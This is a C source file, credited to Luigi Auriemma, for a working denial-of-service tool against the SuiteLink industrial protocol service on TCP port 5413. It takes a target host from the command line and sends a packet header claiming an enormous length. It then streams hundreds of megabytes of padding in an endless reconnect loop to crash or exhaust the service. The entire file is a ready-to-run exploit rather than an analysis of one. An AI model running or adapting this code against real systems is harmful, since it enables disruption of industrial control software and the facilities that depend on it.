/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stricmp strcasecmp
    #define stristr strcasestr
    #define strnicmp strncasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1a"
#define BUFFSZ      0x100000



int create_socket(int type, struct sockaddr_in *peer);
int sl_send(int sd, u8 *data, u32 size);
int mysend(int sd, void *data, int size);
int putsu(u8 *data, u8 *str);
int putcc(u8 *data, int chr, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



static u8 *guid[] = {
    "\xCA\xFE\x8B\xBA\xFE\x8B\xD3\x11\xAA\x05\x00\xA0\xC9\xEC\xFD\x9F", // query
    "\x60\x5F\xC3\xB1\x2D\x05\xD1\x11\xBF\x08\x00\xA0\xC9\x72\x3E\x82",
    "\xD5\xCF\xC7\xF8\x0B\xCD\xD3\x11\xAA\x10\x00\xA0\xC9\xEC\xFD\x9F", // registration
    NULL
};



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i,
            len,
            size;
    u16     port    = 5413;
    u8      *buff,
            *host;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "SuiteLink Denial of Service " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%d)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

redo:
    sd = create_socket(IPPROTO_TCP, &peer);

    size = 0x24000000;

    if(sl_send(sd, NULL, size) < 0) goto quit;

    // guid[0] or guid[2] is the same
    if(mysend(sd, guid[0], 16) < 0) goto quit;  size -= 16;
    if(mysend(sd, guid[1], 16) < 0) goto quit;  size -= 16;
    putxx(buff, 1, 32);
    if(mysend(sd, buff, 4) < 0) goto quit;      size -= 4;

    printf("- send long unicode string\n");
    size -= 2;  // reserve space for the final NULL
    memset(buff, 'a', BUFFSZ);
    for(i = 0; i < size; i += BUFFSZ) {
        if(mysend(sd, buff, ((size - i) >= BUFFSZ) ? BUFFSZ : (size - i)) < 0) goto quit;
        printf("  %03d%%\r", (int)(((long long)i * (long long)100) / (long long)size));
    }
    printf("\n");
    if(mysend(sd, "\0\0", 2) < 0) goto quit;
    // no need to send the other fields

    for(;;) {
        len = recv(sd, buff, BUFFSZ, 0);
        if(len <= 0) break;
    }
    close(sd);
    goto redo;

quit:
    printf("- done\n");
    //close(sd);
    return(0);
}



int sl_send(int sd, u8 *data, u32 size) {
    u8      tmp[4];

    if(mysend(sd, "\0", 1) < 0) return(-1);
    if(mysend(sd, "\0\0", 2) < 0) return(-1);
    putxx(tmp, size, 32);
    if(mysend(sd, tmp, 4) < 0) return(-1);
    if(data) {
        if(mysend(sd, data, size) < 0) return(-1);
    }
    return(0);
}



int mysend(int sd, void *data, int size) {
    int     len;
    len = send(sd, data, size, 0);
    if(len != size) return(-1);
    return(0);
}



int create_socket(int type, struct sockaddr_in *peer) {
    static struct linger ling = {1,1};
    static int  on  = 1;
    int     sd;

    if(type == IPPROTO_TCP) {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        printf("- connected\n");
    } else {
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
    }
    setsockopt(sd, SOL_SOCKET, SO_LINGER,    (char *)&ling, sizeof(ling));
    setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on,   sizeof(on));
    setsockopt(sd, IPPROTO_TCP, TCP_NODELAY, (char *)&on,   sizeof(on));
    return(sd);
}



int putsu(u8 *data, u8 *str) {
    int     i;
    u8      *p;

    p = data;
    for(i = 0; str[i]; i++) {
        *p++ = str[i];
        *p++ = 0;
    }
    *p++ = 0;
    *p++ = 0;
    return(p - data);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    if(bits <= 4) bytes = bits;
    else          bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
        //num |= (data[i] << ((bytes - 1 - i) << 3));
    }
    if(ret) *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    if(bits <= 4) bytes = bits;
    else          bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = num >> (i << 3);
        //data[i] = num >> ((bytes - 1 - i) << 3);
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        }
        host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


